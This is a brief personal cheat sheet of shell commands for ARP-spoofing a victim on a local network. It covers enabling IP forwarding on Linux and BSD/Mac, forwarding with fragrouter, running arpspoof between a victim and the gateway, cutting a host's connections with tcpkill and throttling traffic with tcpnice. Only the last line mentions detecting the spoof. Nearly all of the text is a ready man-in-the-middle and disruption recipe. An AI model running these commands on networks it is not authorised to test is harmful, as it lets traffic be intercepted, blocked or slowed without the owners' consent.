Notes to self because I never remember
To arpspoof, turn on IP forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
with Linux (might need su) or more permanently,
net.ipv4.ip_forward = 1
in /etc/sysctl.conf
In BSD/Mac OS X,
sysctl -w net.inet.ip.forwarding=1
or
net.inet.ip.forwarding = 1
in /etc/sysctl.conf
Alternatively, you can also use fragrouter to forward packets with
fragrouter -B1
Then to arpspoof
arpspoof -t [victim ip] [gateway ip]arpspoof -t [gateway ip] [victim ip]
Optionally, add
& > /dev/null
to get rid of output. Trust me, there’s nothing interesting.
To block sites/ports:
tcpkill -9 host www.facebook.com or port 5432
To slow down traffic:
tcpnice net 10.0.0.2 or port 5432
Filter expressions are here
The easiest way to detect this spoofing is to ping something outside your gateway and look for redirects